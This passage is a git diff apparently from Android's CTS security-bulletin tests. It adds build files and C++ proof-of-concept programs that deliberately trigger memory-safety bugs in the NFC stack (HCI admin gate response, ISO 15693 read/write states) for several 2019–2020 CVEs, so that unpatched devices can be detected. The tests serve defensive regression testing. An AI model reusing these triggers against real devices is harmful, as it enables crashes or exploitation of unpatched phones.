+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2019-2207",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp
new file mode 100644
index 0000000..f94ee94
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "nfa_hci_defs.h"
+#include "nfa_hci_int.h"
+#define SIZE 16
+
+extern tNFA_HCI_CB nfa_hci_cb;
+
+int main() {
+ nfa_hci_cb.cmd_sent = NFA_HCI_ANY_GET_PARAMETER;
+ nfa_hci_cb.param_in_use = NFA_HCI_HOST_LIST_INDEX;
+ uint8_t data_len = SIZE * 6;
+ uint8_t *data = (uint8_t *)malloc(SIZE);
+ if (!data) {
+ return EXIT_FAILURE;
+ }
+ nfa_hci_handle_admin_gate_rsp(data, data_len);
+ free(data);
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp
index f388f89..720a76d 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp
@@ -20,135 +20,60 @@
#define MAX_PARAMETER_SETS (9)
#define MAX_NUM_OTT (5)
-
-#define RETURN_EXIT_FAILURE_IF_NULL(ptr) \
- { \
- if (!ptr) { \
- return freeAllocatedMemoryAndReturn(frame, decoder, EXIT_FAILURE); \
- } \
- }
+#define ARR_SIZE (16)
typedef signed char SCHAR;
-int freeAllocatedMemoryAndReturn(SPATIAL_BS_FRAME *frame, spatialDec *decoder,
- int errorCode) {
- if (frame) {
- if (frame->CLDLosslessData) {
- for (int i = 0; i < MAX_NUM_OTT; ++i) {
- if ((&frame->CLDLosslessData[i])->state) {
- free((&frame->CLDLosslessData[i])->state);
- (&frame->CLDLosslessData[i])->state = nullptr;
- }
- }
- free(frame->CLDLosslessData);
- frame->CLDLosslessData = nullptr;
- }
- if (frame->ICCLosslessData) {
- free(frame->ICCLosslessData);
- frame->ICCLosslessData = nullptr;
- }
- if (frame->IPDLosslessData) {
- free(frame->IPDLosslessData);
- frame->IPDLosslessData = nullptr;
- }
- free(frame);
- frame = nullptr;
- }
-
- if (decoder) {
- if (decoder->pConfigCurrent) {
- free(decoder->pConfigCurrent);
- decoder->pConfigCurrent = nullptr;
- }
- if (decoder->ottCLDidxPrev) {
- free(decoder->ottCLDidxPrev);
- decoder->ottCLDidxPrev = nullptr;
- }
- if (decoder->smgTime) {
- free(decoder->smgTime);
- decoder->smgTime = nullptr;
- }
- if (decoder->smgData) {
- free(decoder->smgData);
- decoder->smgData = nullptr;
- }
- if (decoder->smoothState) {
- free(decoder->smoothState);
- decoder->smoothState = nullptr;
- }
- free(decoder);
- decoder = nullptr;
- }
- return errorCode;
-}
-
int main() {
- spatialDec *decoder = (spatialDec *)malloc(sizeof(spatialDec));
- if (!decoder) {
- return EXIT_FAILURE;
- }
- SPATIAL_BS_FRAME *frame =
- (SPATIAL_BS_FRAME *)malloc(sizeof(SPATIAL_BS_FRAME));
+ spatialDec decoder;
+ memset(&decoder, 0x0, sizeof(spatialDec));
- RETURN_EXIT_FAILURE_IF_NULL(frame);
- memset(frame, 0x00, sizeof(SPATIAL_BS_FRAME));
+ decoder.numOttBoxes = MAX_NUM_OTT;
- RETURN_EXIT_FAILURE_IF_NULL(decoder);
- memset(decoder, 0x00, sizeof(spatialDec));
+ SPATIAL_SPECIFIC_CONFIG pConfigCurrent;
+ memset(&pConfigCurrent, 0x0, sizeof(SPATIAL_SPECIFIC_CONFIG));
+ decoder.pConfigCurrent = &pConfigCurrent;
- size_t allocSize = sizeof(LOSSLESSDATA) * MAX_NUM_OTT * MAX_NUM_PARAMETERS;
+ SCHAR ottCLDidxPrev[ARR_SIZE] = {};
+ decoder.ottCLDidxPrev = (SCHAR **)&ottCLDidxPrev;
- frame->CLDLosslessData = (LOSSLESSDATA *)malloc(allocSize);
- RETURN_EXIT_FAILURE_IF_NULL(frame->CLDLosslessData);
- memset(frame->CLDLosslessData, 0x00, allocSize);
+ int smgTime = 1;
+ decoder.smgTime = &smgTime;
- frame->ICCLosslessData = (LOSSLESSDATA *)malloc(allocSize);
- RETURN_EXIT_FAILURE_IF_NULL(frame->ICCLosslessData);
- memset(frame->CLDLosslessData, 0x00, allocSize);
+ UCHAR smgData[ARR_SIZE] = {};
+ decoder.smgData = (UCHAR **)&smgData;
- frame->IPDLosslessData = (LOSSLESSDATA *)malloc(allocSize);
- RETURN_EXIT_FAILURE_IF_NULL(frame->IPDLosslessData);
- memset(frame->CLDLosslessData, 0x00, allocSize);
+ SMOOTHING_STATE smoothState;
+ memset(&smoothState, 0x0, sizeof(SMOOTHING_STATE));
+ decoder.smoothState = &smoothState;
- frame->numParameterSets = MAX_PARAMETER_SETS;
+ decoder.arbitraryDownmix = 0;
+ (decoder.concealInfo).concealState = SpatialDecConcealState_Ok;
+
+ const size_t allocSize = MAX_NUM_OTT * MAX_NUM_PARAMETERS;
+
+ SPATIAL_BS_FRAME frame;
+ memset(&frame, 0x0, sizeof(SPATIAL_BS_FRAME));
+
+ frame.numParameterSets = MAX_PARAMETER_SETS;
+
+ LOSSLESSDATA CLDLosslessData[allocSize] = {};
+ frame.CLDLosslessData = CLDLosslessData;
+
+ LOSSLESSDATA ICCLosslessData[allocSize] = {};
+ frame.ICCLosslessData = ICCLosslessData;
+
+ LOSSLESSDATA IPDLosslessData[allocSize] = {};
+ frame.IPDLosslessData = IPDLosslessData;
for (int i = 0; i < MAX_NUM_OTT; ++i) {
- (&frame->CLDLosslessData[i])->state = nullptr;
for (int j = 0; j < MAX_PARAMETER_SETS; ++j) {
- (&frame->CLDLosslessData[i])->bsXXXDataMode[j] = 2;
+ (frame.CLDLosslessData[i]).bsXXXDataMode[j] = 2;
}
- (&frame->CLDLosslessData[i])->state =
- (LOSSLESSSTATE *)malloc(sizeof(LOSSLESSSTATE));
- RETURN_EXIT_FAILURE_IF_NULL((&frame->CLDLosslessData[i])->state);
- memset((&frame->CLDLosslessData[i])->state, 0x00, sizeof(LOSSLESSSTATE));
+ LOSSLESSSTATE lossLessState;
+ (frame.CLDLosslessData[i]).state = &lossLessState;
}
- decoder->numOttBoxes = MAX_NUM_OTT;
-
- decoder->pConfigCurrent =
- (SPATIAL_SPECIFIC_CONFIG *)malloc(sizeof(SPATIAL_SPECIFIC_CONFIG));
- RETURN_EXIT_FAILURE_IF_NULL(decoder->pConfigCurrent);
- memset(decoder->pConfigCurrent, 0x00, sizeof(SPATIAL_SPECIFIC_CONFIG));
-
- decoder->ottCLDidxPrev = (SCHAR **)malloc(sizeof(SCHAR *));
- RETURN_EXIT_FAILURE_IF_NULL(decoder->ottCLDidxPrev);
- memset(decoder->ottCLDidxPrev, 0x00, sizeof(SCHAR *));
-
- decoder->smgTime = (int *)malloc(sizeof(int));
- RETURN_EXIT_FAILURE_IF_NULL(decoder->smgTime);
- memset(decoder->smgTime, 0x00, sizeof(int));
-
- decoder->smgData = (UCHAR **)malloc(sizeof(UCHAR *));
- RETURN_EXIT_FAILURE_IF_NULL(decoder->smgData);
- memset(decoder->smgData, 0x00, sizeof(UCHAR *));
-
- decoder->smoothState = (SMOOTHING_STATE *)malloc(sizeof(SMOOTHING_STATE));
- RETURN_EXIT_FAILURE_IF_NULL(decoder->smoothState);
- memset(decoder->smoothState, 0x00, sizeof(SMOOTHING_STATE));
-
- decoder->arbitraryDownmix = 0;
- (decoder->concealInfo).concealState = SpatialDecConcealState_Ok;
-
- SpatialDecDecodeFrame(decoder, frame);
- return freeAllocatedMemoryAndReturn(frame, decoder, EXIT_SUCCESS);
+ SpatialDecDecodeFrame(&decoder, &frame);
+ return EXIT_SUCCESS;
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp
new file mode 100644
index 0000000..faa30ca
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2020-0006",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp
new file mode 100644
index 0000000..7d4388b
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp
@@ -0,0 +1,89 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <tags_defs.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+char enable_selective_overload = ENABLE_NONE;
+
+// borrowed from rw_i93.cc
+#define RW_I93_FORMAT_DATA_LEN 8
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t* p_uid);
+void* vulnerable_ptr;
+
+void* GKI_getbuf(uint16_t size) {
+ void* ptr = malloc(size);
+ if (size == RW_I93_FORMAT_DATA_LEN) {
+ vulnerable_ptr = ptr;
+ }
+ return ptr;
+}
+
+void GKI_freebuf(void* p_buf) {
+ if (p_buf == vulnerable_ptr) {
+ free(p_buf);
+ }
+}
+
+int main() {
+ enable_selective_overload = ENABLE_ALL;
+ tRW_I93_CB* p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR*)malloc(sizeof(NFC_HDR));
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ p_i93->state = RW_I93_STATE_FORMAT;
+ p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY;
+ p_i93->block_size = I93_MAX_BLOCK_LENGH - 1;
+ p_data->status = NFC_STATUS_OK;
+ TIMER_LIST_ENT pFirst = {};
+ nfc_cb.quick_timer_queue.p_first = &pFirst;
+
+ p_cb->p_cback(0, event, p_data);
+ free(p_data->data.p_data);
+ free(p_data);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/Android.bp
new file mode 100644
index 0000000..53d8fe7
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/Android.bp
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2020-0037",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/poc.cpp
new file mode 100644
index 0000000..ab796be
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/poc.cpp
@@ -0,0 +1,110 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+char enable_selective_overload = ENABLE_NONE;
+
+#include <dlfcn.h>
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <tags_defs.h>
+
+// borrowed from rw_i93.cc
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t *p_uid);
+
+bool kIsInitialized = false;
+
+static void *(*real_GKI_getbuf)(uint16_t size) = nullptr;
+static void (*real_GKI_freebuf)(void *ptr) = nullptr;
+
+void init(void) {
+ real_GKI_getbuf = (void *(*)(uint16_t))dlsym(RTLD_NEXT, "_Z10GKI_getbuft");
+ if (!real_GKI_getbuf) {
+ return;
+ }
+
+ real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv");
+ if (!real_GKI_freebuf) {
+ return;
+ }
+
+ kIsInitialized = true;
+}
+
+void *GKI_getbuf(uint16_t size) {
+ if (!kIsInitialized) {
+ init();
+ }
+ return malloc(size);
+}
+
+void GKI_freebuf(void *ptr) {
+ if (!kIsInitialized) {
+ init();
+ }
+ free(ptr);
+}
+
+int main() {
+ tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16);
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+ p_i93->state = RW_I93_STATE_SET_READ_ONLY;
+ p_i93->sub_state = RW_I93_SUBSTATE_WAIT_CC;
+ p_i93->block_size = 255;
+
+ enable_selective_overload = ENABLE_ALL;
+ tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR *)GKI_getbuf(sizeof(NFC_HDR));
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_NONE;
+
+ (p_data->data.p_data)->len = 10;
+ p_data->data.p_data->offset = 0;
+ p_data->status = NFC_STATUS_OK;
+
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_data);
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/Android.bp
new file mode 100644
index 0000000..836d134
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/Android.bp
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2020-0038",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/poc.cpp
new file mode 100644
index 0000000..c18331f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/poc.cpp
@@ -0,0 +1,110 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+char enable_selective_overload = ENABLE_NONE;
+
+#include <dlfcn.h>
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <tags_defs.h>
+
+// borrowed from rw_i93.cc
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t *p_uid);
+
+bool kIsInitialized = false;
+
+static void *(*real_GKI_getbuf)(uint16_t size) = nullptr;
+static void (*real_GKI_freebuf)(void *ptr) = nullptr;
+
+void init(void) {
+ real_GKI_getbuf = (void *(*)(uint16_t))dlsym(RTLD_NEXT, "_Z10GKI_getbuft");
+ if (!real_GKI_getbuf) {
+ return;
+ }
+
+ real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv");
+ if (!real_GKI_freebuf) {
+ return;
+ }
+
+ kIsInitialized = true;
+}
+
+void *GKI_getbuf(uint16_t size) {
+ if (!kIsInitialized) {
+ init();
+ }
+ return malloc(size);
+}
+
+void GKI_freebuf(void *ptr) {
+ if (!kIsInitialized) {
+ init();
+ }
+ free(ptr);
+}
+
+int main() {
+ tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16);
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+ p_i93->state = RW_I93_STATE_UPDATE_NDEF;
+ p_i93->sub_state = RW_I93_SUBSTATE_RESET_LEN;
+ p_i93->block_size = 30;
+
+ enable_selective_overload = ENABLE_ALL;
+ tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR *)GKI_getbuf(sizeof(NFC_HDR));
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_NONE;
+
+ (p_data->data.p_data)->len = 10;
+ p_data->data.p_data->offset = 0;
+ p_data->status = NFC_STATUS_OK;
+
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_data);
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/Android.bp
new file mode 100644
index 0000000..cfad9f3
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/Android.bp
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2020-0039",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/poc.cpp
new file mode 100644
index 0000000..cba5ff5
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/poc.cpp
@@ -0,0 +1,111 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+char enable_selective_overload = ENABLE_NONE;
+
+#include <dlfcn.h>
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <tags_defs.h>
+
+// borrowed from rw_i93.cc
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t *p_uid);
+
+bool kIsInitialized = false;
+
+static void *(*real_GKI_getbuf)(uint16_t size) = nullptr;
+static void (*real_GKI_freebuf)(void *ptr) = nullptr;
+
+void init(void) {
+ real_GKI_getbuf = (void *(*)(uint16_t))dlsym(RTLD_NEXT, "_Z10GKI_getbuft");
+ if (!real_GKI_getbuf) {
+ return;
+ }
+
+ real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv");
+ if (!real_GKI_freebuf) {
+ return;
+ }
+
+ kIsInitialized = true;
+}
+
+void *GKI_getbuf(uint16_t size) {
+ if (!kIsInitialized) {
+ init();
+ }
+ return malloc(size);
+}
+
+void GKI_freebuf(void *ptr) {
+ if (!kIsInitialized) {
+ init();
+ }
+ free(ptr);
+}
+
+int main() {
+ tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16);
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+ p_i93->state = RW_I93_STATE_UPDATE_NDEF;
+ p_i93->sub_state = RW_I93_SUBSTATE_UPDATE_LEN;
+ p_i93->block_size = 30;
+ p_i93->rw_length = 1;
+
+ enable_selective_overload = ENABLE_ALL;
+ tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR *)GKI_getbuf(sizeof(NFC_HDR));
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_NONE;
+
+ (p_data->data.p_data)->len = 10;
+ p_data->data.p_data->offset = 0;
+ p_data->status = NFC_STATUS_OK;
+
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_data);
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp
new file mode 100644
index 0000000..807b9106
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2020-0073",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ compile_multilib: "64",
